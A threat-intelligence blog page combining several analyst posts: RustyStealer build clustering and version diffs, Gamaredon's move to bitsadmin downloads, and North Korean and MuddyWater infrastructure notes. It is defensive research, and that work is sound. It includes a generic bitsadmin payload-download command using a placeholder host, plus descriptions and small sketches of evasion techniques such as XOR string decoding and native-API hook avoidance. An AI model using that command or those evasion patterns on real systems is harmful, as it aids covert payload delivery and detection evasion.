August 2025: Domain Registration

In this period we saw:

  • Continued military demonstrations
  • Publicized return of North Korean personnel from Russia
  • Increased diplomatic engagement with Russia and China
  • Rising international visibility

There is no single triggering political event on this exact date. However, the broader trend shows increased outward-facing engagement.

Interpretation

Registering an externally usable domain such as nisp.cc may reflect a desire to make services more reliably reachable and interoperable internationally during a phase of expanding external activity.

Possible Infrastructure Bridging Function

Even without explicit political announcements, infrastructure often moves first.

It is entirely plausible that North Korea:

  • began improving external visibility of selected services
  • equipped gateways with internationally compatible identities
  • prepared controlled external access paths for future operational needs

Such changes rarely happen accidentally in centralized environments.

Final Thoughts: Why This Matters

Much of today's threat intelligence still revolves around malware samples, campaign names, and short-lived indicators of compromise. That perspective is fundamentally insufficient when dealing with nation states.
States themselves act as long-term threat actors. Their infrastructure evolves far more slowly than malware and when it does change, it usually means someone made a deliberate decision, signed off on a budget, and probably sat through far too many internal meetings.

Infrastructure artifacts quietly expose things most actors would rather not advertise:

  • organizational maturity (or the lack thereof)
  • centralization models
  • operational priorities
  • capacity planning assumptions
  • risk tolerance
  • and governance culture

A single TLS certificate, a misaligned identity domain, or an absurdly permissive transport policy can easily reveal more about an actor's operational reality than dozens of shiny malware samples ever could. Sometimes the most valuable intelligence comes from reading what a system accidentally tells you about itself.
This small case demonstrates how even boring protocol metadata can function as a durable intelligence signal when correlated properly. Observing infrastructure drift across threat actors or states allows us to detect strategic movement long before it becomes visible in campaigns, headlines, or incident reports.
And as a small bonus observation: while geopolitical ambition clearly scales, PKI maturity and configuration hygiene appear to lag slightly behind. Infrastructure may evolve quickly; governance apparently takes its time ^-^

RustyStealer: Your Compiler Is Snitching on You


by Robin Dost

As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.

Mostly out of curiosity, partly out of stubbornness.
At least this way we get something that resembles actual analysis rather than archaeological string hunting.

Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.

RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here's an article from cloudseek.com if you are interested in the details of its delivery and execution behavior.


And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.

What I’m interested in instead is how this thing evolves over time and how to track it:

How do the binaries change between builds?
Which libs appear or disappear?
When does the architecture shift?
Where do experiments get rolled back?
Which parts get hardened, obfuscated or simplified?

The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities.

And honestly: that’s way more fun than grepping strings all day, and more useful for my threat actor research.

For the analysis I used the following samples:

Hash | Date
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd | 08.01.2026
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914 | 08.01.2026
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58 | 08.01.2026
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108 | 08.01.2026
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79 | 10.01.2026

My first step: I always start with the lowest-effort signal, raw strings.
Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.

The first thing I wanted to verify was whether any additional user paths were embedded in the samples:

for x in *.exe; do r="$(strings "$x" | grep 'C:')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done

And yes, in two of the binaries we do indeed find another leftover artefact:

C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...

Just to be clear: the developer is almost certainly not named Bruno/Jacob.
This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.

Dependency extraction and library fingerprinting:

Next, I wanted to extract the dependency information from the binaries:

# get llvm strings
for x in *.exe; do r="$(strings "$x" | grep 'llvm')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort -u >> "$x.strings"; done
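If you prefer something more testable than a shell one-liner, the same split can be sketched in a few lines of Python. The regex below is an assumption based on the typical cargo registry path layout (`...\index.crates.io-<hash>\<crate>-<version>\...`), not something recovered from the samples:

```python
import re

# Matches the crates.io registry path fragment that rustc embeds in
# panic/debug strings, capturing the crate name and its version.
CRATE_RE = re.compile(
    r"index\.crates\.io-[0-9a-f]+[\\/]([A-Za-z0-9_-]+?)-(\d[\w.+-]*)[\\/]"
)

def extract_crates(strings_output):
    """Return sorted unique (crate, version) pairs from strings output."""
    found = set()
    for line in strings_output.splitlines():
        for name, version in CRATE_RE.findall(line):
            found.add((name, version))
    return sorted(found)
```

The non-greedy name group plus the digit-anchored version group keeps crates with trailing digits (h2, socket2, base64) from being split in the wrong place.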

This gives us a list of Rust crates and libraries that were present at build time:

From this output I consolidated a full list of all dependencies observed across all samples.
It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?

In total, the consolidated list contains 50 libraries; however, each individual sample only exposes around 44-45 crates.
That already tells us that not all builds are identical.

Here is the full list of observed libraries:

Library | Version
aead | 0.5.2
aes | 0.8.4
aes-gcm | 0.10.3
atomic-waker | 1.1.2
base64 | 0.22.1
bytes | 1.10.1
cipher | 0.4.4
ctr | 0.9.2
futures-channel | 0.3.31
futures-core | 0.3.31
futures-util | 0.3.31
generic-array | 0.14.7
h2 | 0.4.12
hashbrown | 0.15.5
http | 1.3.1
httpparse | 1.10.1
http-body-util | 1.7.0
hyper | 1.7.0
hyper-tls | 0.6.0
hyper-utils | 0.1.16
icu_collections | 2.0.0
icu_normalizer | 2.0.0
idna | 1.1.10
indexmap | 2.11.0
ipnet | 2.11.0
iri-string | 0.7.8
mio | 1.0.4
native-tls | 0.2.14
percent-encoding | 2.3.2
rand | 0.6.5
rand_core | 0.4.2
rand_hc | 0.1.0
rand_jitter | 0.1.4
reqwest | 0.12.23
schannel | 0.1.27
slab | 0.4.11
smallvec | 1.15.1
socket2 | 0.6.0
tokio | 1.47.1
tokio-native-tls | 0.3.1
tokio-util | 0.7.16
tower | 0.5.2
universal-hash | 0.5.1
url | 2.5.7
utf8_iter | 1.0.4
want | 0.3.1
windows-registry | 0.5.3
winreg | 0.55.0
rustc-demangle | 0.1.24
rustc-demangle | 0.1.26

Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:

This makes deviations immediately visible without having to manually diff text dumps.

Compile timestamps

Before grouping anything, I also checked when the individual binaries were compiled.

This can be extracted using:

for x in *.exe; do printf '%s' "$x"; objdump -x "$x" | grep "Time/Date"; done

Result:

File Hash | Compile Date
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914 | Tue Sep 23 10:44:52 2025
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd | Sun Oct 19 21:17:34 2025
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108 | Sun Nov 16 23:41:42 2025
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79 | Sun Nov 16 23:41:42 2025
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58 | Mon Jan 5 06:33:07 2026
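objdump works fine, but the same field can also be read with a few lines of stdlib Python if you want it machine-readable. This is a sketch of the standard PE/COFF layout, and keep in mind the TimeDateStamp is attacker-controllable and can be forged:

```python
import struct, datetime

def pe_compile_timestamp(data):
    """Read the COFF TimeDateStamp from raw PE bytes as a UTC datetime.

    Layout: e_lfanew at offset 0x3C points to the "PE\\0\\0" signature;
    the 4-byte TimeDateStamp sits 8 bytes after that (Machine and
    NumberOfSections come first in the COFF header).
    """
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.datetime.fromtimestamp(stamp, datetime.timezone.utc)
```

Running this over the samples reproduces the objdump output above, just in a form that is easier to correlate programmatically.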

TLSH similarity analysis

As a final preprocessing step I generated TLSH hashes for all samples.

TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files.
Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.

For malware analysis purposes, this is especially useful when clustering variants, detecting rebuilds and separating development branches.

To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:
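A minimal sketch of such a script, assuming the py-tlsh package (where `tlsh.hash(bytes)` returns a digest string and `tlsh.diff(a, b)` a distance), with the hashing and distance functions injectable for testing:

```python
import itertools

def tlsh_digests(paths, hasher=None):
    """Compute a TLSH digest per file. Uses py-tlsh unless a custom
    hashing function is injected."""
    if hasher is None:
        import tlsh  # pip install python-tlsh
        hasher = tlsh.hash
    digests = {}
    for path in paths:
        with open(path, "rb") as f:
            digests[path] = hasher(f.read())
    return digests

def pairwise_distances(digests, diff=None):
    """Return (a, b, distance) for every digest pair, sorted by distance."""
    if diff is None:
        import tlsh
        diff = tlsh.diff
    pairs = [
        (a, b, diff(digests[a], digests[b]))
        for a, b in itertools.combinations(sorted(digests), 2)
    ]
    return sorted(pairs, key=lambda t: t[2])
```

Sorting by distance makes the cluster boundaries fall out almost by themselves: tight core builds sit at the top, branch builds drift towards the bottom.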

Clustering the samples

With all of this data available, we can now perform a reasonably robust clustering of the samples.

The key point here is that no single metric decides on its own. Instead, the correlation of multiple independent signals matters:

  • TLSH similarity
  • Compile timestamps
  • Library fingerprints
  • Embedded user artefacts

Cluster 1: Core codebase

The first cluster represents the actual core of the codebase and contains the samples:

  • e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd
  • e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108
  • a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79

All three share identical lib dependencies and are compiled close together in time, two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further hints at a consistent build environment.

Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.

Cluster 2: Early feature branch

A second, clearly separable cluster consists solely of:

  • ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914

This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples.
Combined with its earlier compile timestamp, I read this as a temporary feature branch or experiment rather than a fully independent development line.

Cluster 3: Later modernization branch

The third cluster is represented by:

  • 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

This build differs by multiple additional libraries and introduces a newer version of rustc-demangle.
Additionally, a different username ("Jacob") appears in the artefacts.
While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range.
Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality.

Overall, this results in a three-tier model:

  • A stable core cluster forming the technical baseline
  • An early feature branch with minimal extension
  • A later modernization branch with a changed toolchain and build environment

My clustering is not driven by hash similarity alone; it only becomes reliable through the combined temporal, structural and artefact-based correlation. It also provides insight into development practices, build discipline and potential role separation within the malware's development process.

Version mapping

Based on this clustering, I derived the following version mapping:

Version | Sample (SHA256) | Compile Date | Cluster | Notes | Developer
v0.9 | ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914 | 23.09.2025 | Registry branch | + winreg library (feature experiment) | unknown
v1.0 | e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd | 19.10.2025 | Core | Baseline toolchain | Bruno
v1.1 | e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108 | 16.11.2025 | Core | Parallel build, stable stack | Bruno
v1.1b | a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79 | 16.11.2025 | Core | Parallel build (same timestamp) | Bruno
v2.0 | 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58 | 05.01.2026 | Jacob branch | New libs + newer rustc-demangle | Jacob

At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.

For the code comparison I use Ghidra's Version Tracking module. The versions will be analyzed in the following pairs:

v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0

So three comparisons in total, which honestly is still a very manageable workload.

Let’s get started 🙂

Version Tracking workflow

I won’t go into a full tutorial on how Ghidra's Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.

First, I set the confidence filter to:

-1.0 -> 0.950

Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.

For the remaining findings, I set up a small quality-of-life shortcut:

SHIFT + T = Assign Tag

Then I filter the results by:

  • Tag (ascending)
  • Type (ascending)
  • Status (ascending)

and tighten the confidence filter slightly to:

-1.0 → 0.95

This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.

It looks roughly like this:

The workflow is simple:

  • Select the next finding
  • Open code comparison (SHIFT + C)
  • If identical -> accept (SHIFT + A)
  • If different -> assign a tag for later analysis (SHIFT + T)

Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.

I iterate this until all relevant changes are reviewed and documented.


RustyStealer: Evolution from v0.9 to v2.0

What changed, what failed and what the developer learned

During a longitudinal analysis of multiple RustyStealer builds, four development stages became visible to me: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.

Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.

This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.


Version 0.9: Early baseline and rough edges

The earliest observed build (v0.9) represents a relatively raw implementation.

Notable characteristics:

  • Dependency artifacts included unused crates such as winreg / windows-registry (likely early experimentation or leftover scaffolding)
  • No meaningful behavioral differences compared to later v1.0 builds
  • No advanced memory manipulation or cryptographic primitives observed
  • Limited internal abstraction and minimal architectural complexity

From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.


Version 1.0: Cleanup and stabilization

The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.

This looks more like a dependency cleanup than a behavioral refactor.

Key observations:

  • No changes in imported Windows APIs
  • No observable change in capabilities or execution flow
  • Binary differences consistent with rebuild noise and dependency graph cleanup

This phase reflects basic project hygiene rather than feature development.


Version 1.1: Performance experiment and internal refactor

Version 1.1 marks the first technically ambitious change.

Major changes observed:

Introduction of asynchronous and overlapped file I/O:

  • ReadFile, NtReadFile
  • GetOverlappedResult, CancelIo
  • Event-based synchronization (CreateEventW, WaitForMultipleObjects)

Migration to modern Windows path resolution via SHGetKnownFolderPath.

Explicit memory cleanup for shell APIs using CoTaskMemFree.

Removal of host fingerprinting:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

This version appears to have attempted:

  • Faster and more scalable file harvesting.
  • Cleaner filesystem abstraction.
  • Reduced behavioral noise by temporarily disabling host profiling.

However, asynchronous I/O pipelines significantly increase complexity and often cause instability in real-world environments.
To me, this version looks more like a technical experiment than a long-term production design.

Additional findings from later code diffs

Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.

String handling and Defender artefacts

Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial.
In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.

I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.
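To illustrate the pattern conceptually (in Python rather than the implant's Rust; the key constant and the target string below are invented for illustration, not recovered from the samples), runtime string reconstruction boils down to:

```python
def xor_encode(text, key):
    """XOR a cleartext string with a repeating multi-byte key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(text.encode()))

def xor_decode(blob, key):
    """Rebuild the cleartext at runtime; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob)).decode()

# Hypothetical per-routine key constant; each decode routine in the
# samples appears to use its own.
KEY = b"\x5a\x13\x9c"

# A later build would ship only the encoded blob; the cleartext path
# never appears in the binary's strings output.
ENCODED = xor_encode(r"C:\ProgramData\Microsoft\Windows Defender", KEY)
```

The practical effect is exactly what the diffs show: the searchable artefact disappears from static output and only exists transiently in memory after decoding.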

Collection handling and stability

Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets).
The same logic exists in earlier builds but is less defensive and less structured.

This points to stability issues encountered when processing larger data sets, which may have been discovered during or shortly after the scalability experiments introduced in version 1.1.

Modular architecture continuity

Both older and newer builds continue to reference internal Rust modules such as:

  • src\modules\persist.rs
  • src\modules\interface.rs
  • src\modules\information.rs
  • src\modules\detect_av.rs

It confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.

Toolchain and build artefacts

Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality.
This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.

My take

Version 1.1 looks like the point where the developers started stress testing their own architecture.

They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage.
The follow-up changes visible in later diffs show that this experiment exposed two main pain points:

  • Static strings and predictable artefacts were too easy to signature.
  • Increased scale and concurrency exposed stability issues in collection handling.

Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.

To me, 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.


Version 2.0: Architectural consolidation and stealth optimization

Version 2.0 represents a clear update in development priorities.

Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.

Major changes observed:

Removal of asynchronous file pipeline

All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.

The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model.
It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model.
It reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments.

Reintroduction of host fingerprinting

Host identification APIs returned:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

The focus returns to victim profiling, campaign correlation and backend attribution logic.
The temporary removal in v1.1 now appears to have been an experimental privacy / noise reduction phase rather than a permanent design direction.

Migration towards native NT APIs

Several subsystems were migrated towards native system calls:

  • Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
  • File handling introduced NtOpenFile

This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.

Introduction of cryptographic randomness and entropy hardening

Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.

Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation.
The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds.
Only entropy that passes these health checks is propagated further into the execution flow.

The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic keys. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations.
In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions.
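The generate-validate-reject loop described above can be sketched conceptually (in Python rather than the implant's Rust, with `os.urandom` standing in for RtlGenRandom and entirely made-up thresholds):

```python
import collections, os

def healthy_entropy(n, max_tries=5, source=os.urandom):
    """Fetch n random bytes and accept them only if they pass a basic
    distribution sanity check. Thresholds are illustrative, not the
    malware's actual validation logic."""
    for _ in range(max_tries):
        pool = source(n)
        counts = collections.Counter(pool)
        # Reject obviously degenerate output, e.g. a stubbed RNG in a
        # sandbox returning constant bytes: no single byte value may
        # dominate the pool.
        if max(counts.values()) <= max(4, n // 8):
            return pool
    raise RuntimeError("entropy source failed health checks")
```

A sandbox that stubs the RNG with constant output would fail such a check, which is exactly the anti-emulation side effect noted below.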

From an operational perspective this has several implications:

  • Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
  • Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
  • Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
  • The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.

While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, the integration into the decode pipeline indicates that the primary motivation is obfuscation hardening and stealth rather than feature expansion.

It marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify.

Memory protection manipulation (VirtualProtect)

VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.

It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down.
That's consistent with the shift towards runtime API resolution and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or trivially hook.

Internal synchronization refactor

Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx).

I attribute this to architectural cleanup and improved concurrency control.

Obfuscation hardening and decoder abstraction

Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic.
Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.

This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.

Improved memory lifecycle management and cleanup paths

Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.

Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations.
It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.

Build pipeline evolution

Build artifacts show a different Rust toolchain and build environment compared to version 1.1.
Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.

This reflects internal “build pipeline” changes rather than functional malware changes.

Summary

Version 2.0 prioritizes:

  • Simplification and rollback of risky experimental I/O designs
  • Stronger stealth via native API usage and obfuscation hardening
  • Improved runtime stability and memory hygiene
  • Reintroduction of host profiling for operational correlation
  • Internal architectural consolidation rather than feature expansion

Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development.


Conclusion

If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.

By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello async pipeline), rollbacks when ideas don’t survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware.
None of this magically turns RustyStealer into some next-gen cyber superweapon. It’s still fundamentally a fairly standard implant doing fairly standard implant things.
Also it’s a nice reminder that “grep strings > extract a few IOCs > call it a day” only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots.
Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal buuuut the payoff is a much clearer picture of what’s really going on under the hood.

There’s also a more general lesson in all of this, imo.

If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way.
That level of detail is useful, but it doesn't tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time.
These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary or wherever.
When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour, and that is exactly what we want ^-^

Gamaredon: Now Downloading via Windows Update's Best Friend “BITS”

by Robin Dost


There’s yet another update in Gamaredon's GamaLoad scripts, which pushed me to write this article and to slightly revisit my previous post Defending Against Gamaredon: Practical Controls That Actually Work.

In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability.
That said, there are visible changes both in payload delivery and in obfuscation.

I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.

For this analysis, I pulled the latest Gamaredon sample with the hash:

3538618e0ae0f7e73d96843d90323178b1d434262a074fc24be8e36283e7dd92

and dropped it straight into my tracking framework.

From a delivery perspective, not much has changed compared to Gamaredon's last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot.
A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.

When comparing these new samples to the December 2025 batch, one thing immediately stood out:
they are almost twice as large and noticeably more obfuscated.

(Left column: line count, right column: hash+date)

The obfuscation hasn’t just increased (which, honestly, doesn’t help much given how terrible Gamaredon's obfuscation usually is :D), but it has also become slightly smarter.

Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.

So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.

(Variable larkxGg is defined in the junk loop, but used after it)

The Interesting Part

A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP.
If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.

Well, I guess they noticed.

The defensive measures described in that article have now been bypassed.
Don’t worry though, we’ll adjust accordingly 😁

Fallback on Fallback: Now Featuring BITS


The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.

Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.

What’s new is that this fallback logic now has… another fallback.

If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.

What is bitsadmin?

bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads.
Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.

From an attacker’s perspective, BITS has some very attractive properties:

  • resilient background transfers
  • native proxy support
  • high reliability on unstable networks
  • no obvious “malware-looking” process tree

Exactly the kind of boring enterprise plumbing malware loves to hide in ^^
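For reference, the generic shape of a bitsadmin download looks like this (job name, URL and target path are placeholders and the URL is defanged; none of these are Gamaredon IOCs):

```
bitsadmin /transfer updjob /download /priority normal https://example[.]invalid/stage.bin %PUBLIC%\stage.bin
```

The actual transfer is carried out by the BITS service inside svchost.exe, which is exactly why the resulting process tree and network traffic look so unremarkable.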


Why Gamaredon Switched to BITS

For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution.
By now, these techniques are:

  • blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
  • trivial to detect via signatures and behavior
  • operationally noisy (suspicious child processes, script artifacts, obvious telemetry)

BITS lives in a much more comfortable gray zone:

  • it supports persistent and robust downloads
  • it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
  • blocking it outright often creates operational risk in enterprise environments
  • its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
  • it works reliably behind proxies and restrictive networks

If your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step, even for an actor whose tooling evolution is usually measured in geological time.

Is This a Problem?

Not really.

In my article Defending Against Gamaredon: Practical Controls That Actually Work, I now show how you can effectively mitigate BITS abuse without breaking normal business operations.

So yes: Gamaredon adapted.
And yes, we’ll adapt again. That’s kind of the point. 🙂

MuddyWater: When Your Build System Becomes an IOC – “Jacob”


by Robin Dost

EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds.

Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead.
I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.

That plan lasted about five minutes.

What started as a normal sample quickly turned into something much more interesting for me:
the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.

In this post I won’t go into a full behavioral or functional analysis of the payload itself.
Instead, I’ll focus on what we can learn purely from the developer’s mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking.
A more traditional malware analysis of this sample will follow in a future post.

Quick Context: Who Is MuddyWater Anyway?

Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.

MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.

This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies.
